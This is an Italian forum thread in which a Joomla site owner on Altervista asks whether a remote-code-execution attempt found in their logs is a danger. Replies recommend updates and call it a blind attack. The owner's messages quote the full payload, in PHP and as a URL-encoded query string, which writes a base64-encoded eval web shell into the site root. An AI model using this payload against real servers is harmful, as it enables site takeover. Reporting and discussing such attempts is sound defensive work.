Printable View
Salve,
ho notato che sono state richiamate alcune pagine del mio sito con parametri che evidenziano un tentativo di esecuzione di codice remoto (RCE).
Vorrei sapere se usando Joomla qui su Altervista sono al riparo da questi possibili attacchi o se è necessario fare qualcosa per non essere esposti a tali attacchi.
Grazie
Ciao, tieni sempre joomla e tutte le estensioni aggiornate, non scaricare mai niente che non si trova sui siti ufficiali degli sviluppatori, parti sempre dalla jed per cercare estensioni, per un pò di sicurezza in più attiva cloudflare nel pannello di controllo altervista.
Non dipende da AlterVista, ma dalla versione di Joomla che hai installato, e se questa è vulnerabile o meno allo specifico attacco.
Puoi riportare più dettagli al riguardo?
Grazie del suggerimento.
In ogni caso il problema che hoi riscontrato non è dovuto a qualche estensione, ma al fatto che qualcuno ha aggiunto all'url della home page dei parametri che mirano a testare la fulnerabilità del sito. Da quello che ho capito è stato tentata la creazione di un nuovo file php.
Di seguito le istruzioni inserite nella url:
Ora la domanda rimane la stessa:Codice PHP:@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo '->|';
file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));
echo '|<-';
contro questo tipo di attacco joomla qui su altervista è vulnerabile oppure no?
Grazie
Quello è solamente il payload dell'attacco, del codice che i malintenzionati tentano di far eseguire sul server sfruttando una qualche vulnerabilità di Joomla. Se però non indichi esattamente dove l'hai trovato, quali erano i parametri della ricerca e così via non è possibile identificare la vulnerabilità che tentano di sfruttare.
Registro ai fini statistici l'url delle pagine che vengono visualizzate dagli utenti e tra le registrazioni ho trovato questa stringa:
accodata alla ad una url normale.Codice:?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
Spero di essere stato più chiaro.
Grazie
Ma perché non riporti l'URL per intero? Dal solo spezzone che hai riportato non mi sembrerebbe un attacco mirato a Joomla.
Non l'ho riportato completamente perchè non ci sono altri parametri, quella stringa era accodata alla url della index.
Se non è un attacco a Joomla ok, io non sarò abbastanza esperto per dirlo, comunque non mi sembra una buona cosa che qualcuno si sia preoccupato di aggiungere una stringa del genere.
Non so immaginare lo scopo e magari qualcuno me lo può spiegare e capire se è necessario correre ai ripari ed eventualmente come.
Grazie
Ecco, non l'avevi specificato. In questi casi è importante specificare tutti i dettagli che si posseggono, anche se non sembrano rilevanti.Citazione:
Originalmente inviato da huntersMrHide
Ad ogni modo nel tuo caso non mi sembra un attacco al tuo CMS o al tuo specifico sito web, è probabilmente uno dei miliardi di attacchi fatti alla cieca fatti comunemente, se non c'è altro non dovresti preoccuparti di alcunché.
Segui semplicemente i comuni consigli, quelli che RedWebSite ha scritto nel suo messaggio.